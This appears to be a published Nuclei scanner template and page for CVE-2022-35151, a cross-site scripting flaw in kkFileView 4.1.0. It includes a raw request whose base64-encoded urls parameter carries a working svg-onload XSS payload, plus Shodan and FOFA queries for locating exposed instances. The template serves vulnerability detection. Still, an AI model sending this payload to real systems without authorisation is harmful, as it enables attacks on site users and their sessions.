kkFileView 4.1.0 - Cross-Site Scripting
ID: CVE-2022-35151
Severity: medium
Author: arafatansari
Tags: cve,cve2022,xss,kkfileview,keking
Description
Section titled “Description”kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
YAML Source
Section titled “YAML Source”id: CVE-2022-35151
info: name: kkFileView 4.1.0 - Cross-Site Scripting author: arafatansari severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/366 - https://nvd.nist.gov/vuln/detail/CVE-2022-35151 - https://github.com/StarCrossPortal/scalpel - https://github.com/anonymous364872/Rapier_Tool - https://github.com/youcans896768/APIV_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 epss-score: 0.0157 epss-percentile: 0.87243 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview shodan-query: - http.html:"kkFileView" - http.html:"kkfileview" fofa-query: - body="kkfileview" - app="kkfileview" tags: cve,cve2022,xss,kkfileview,keking
http: - raw: - | GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<svg/onload=alert(document.domain)>' - '图片预览' condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100a5206bde8e63b0c4edc28e8c213ce7eef11f9adfd729abefe9806276118aee40022100ce3443f08a60d6fc6f6896d3aa0d82e5d310c0426f48ed450982a2ec90df3832:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-35151.yaml"